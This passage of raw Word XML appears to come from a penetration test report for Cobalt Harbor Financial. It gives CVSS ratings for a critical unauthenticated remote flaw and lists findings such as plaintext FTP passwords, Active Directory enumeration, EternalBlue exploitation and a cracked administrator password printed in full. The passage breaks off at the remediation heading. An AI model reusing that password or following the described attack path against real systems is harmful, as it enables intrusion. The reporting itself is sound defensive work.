        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A28A53A" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vector analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457A054" w14:textId="183C25E5"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 </w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector (AV): </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerabilities can be exploited remotely, and attackers do not need to be within the same local area network. This is the most dangerous attack vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AE6C8A" w14:textId="7A1EDD9D"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 </w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Complexity (AC): </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Low (Low)</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The vulnerability exploitation process is simple and straightforward. There are </w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>many</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> mature and automated attack tools available online (such as the Metasploit module), and successful exploitation can be achieved without advanced techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591C2F95" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E86C28D" w14:textId="14D667E8"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Required permission (</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RP</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> None</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker does not need any form of authentication or access permission before exploiting this vulnerability. This is a zero-threshold attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD453B" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E25B97" w14:textId="066E3E69"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Interaction (UI):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> None</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The entire attack process is carried out entirely in the background, without the need for any user on the target system to perform interactive operations such as clicking or opening files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BF877" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E06475" w14:textId="2A93B5FA"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scope of impact (S):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unchanged</w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The impact of </w:t>
      </w:r>
      <w:r w:rsidR="00B24894" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>this vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is limited to the system under attack itself, but this impact has been maximized since the system is under full control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587BC7CC" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B7AA39C" w14:textId="77777777"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Confidentiality impact (C):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> High: Attackers can obtain the highest system privileges, read, copy or steal all data on the server, including databases, user files, system configurations, etc., resulting in the complete destruction of confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433D940F" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AE396FA" w14:textId="77777777"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Integrity impact (I):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> High: Attackers can arbitrarily modify or delete system files and user data, and can install ransomware, mining programs and other malicious software, resulting in the complete destruction of system integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B71C1" w14:textId="77777777" w:rsidR="0089073C" w:rsidRPr="0022306B" w:rsidRDefault="0089073C" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7823BFAC" w14:textId="77777777"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability impact (A):</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> High: Attackers can shut down critical services, delete system files causing system crashes, or directly shut down the server, resulting in a complete business interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7D14EF" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F98DA94" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.2 Other identified security vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56066417" w14:textId="5BACE2FA"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The </w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vulnerability name describes the severity level</w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3A97CD" w14:textId="4C7CE929" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure credential storage is extremely important. Service (FTP) passwords are stored in plain text in a text file, and any user or program that can access this file can easily obtain them. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051DB662" w14:textId="3AAF0DC7" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk: High</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200DB13D" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The administrator password Manga113</w:t>
      </w:r>
      <w:r w:rsidR="00242CE4" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> was cracked due to insufficient strength! The combination is relatively simple and does not conform to complex password policies with high security, making it easy to be cracked by brute force. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE7E52" w14:textId="55F48135" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512A8646" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Excessive information leakage and open services such as DNS, Kerberos, and LDAP allow for unauthenticated queries, which could be exploited by attackers to map the topology of the internal active directory (AD) environment and collect valid usernames and hostnames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0EA61" w14:textId="676E1214" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Risk: </w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B2E299" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The successful exploitation of the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>" vulnerability directly proves that the system lacks an effective patch management strategy and critical security updates have not been deployed in a timely manner.</w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C55DF" w14:textId="3B24A3F6" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="00263553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="720" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk: Critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86FC30" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E85B5C6" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.0 Repair Suggestions and Long-Term Security Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B3BFB" w14:textId="3DA478E5"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We suggest </w:t>
      </w:r>
      <w:r w:rsidR="007742B2" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>adopt</w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> a "defense in depth" strategy, </w:t>
      </w:r>
      <w:r w:rsidR="00263553" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> not only involves fixing the currently discovered vulnerabilities but also establishing a complete security mechanism to deal with future threats. It is suggested to be divided into two parts: short-term emergency repair and long-term strategic reinforcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E5C5B" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2058D7DD" w14:textId="04B883A1" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.1 Short-term Emergency Repair Measures (Immediate implementation)</w:t>
      </w:r>
    </w:p>
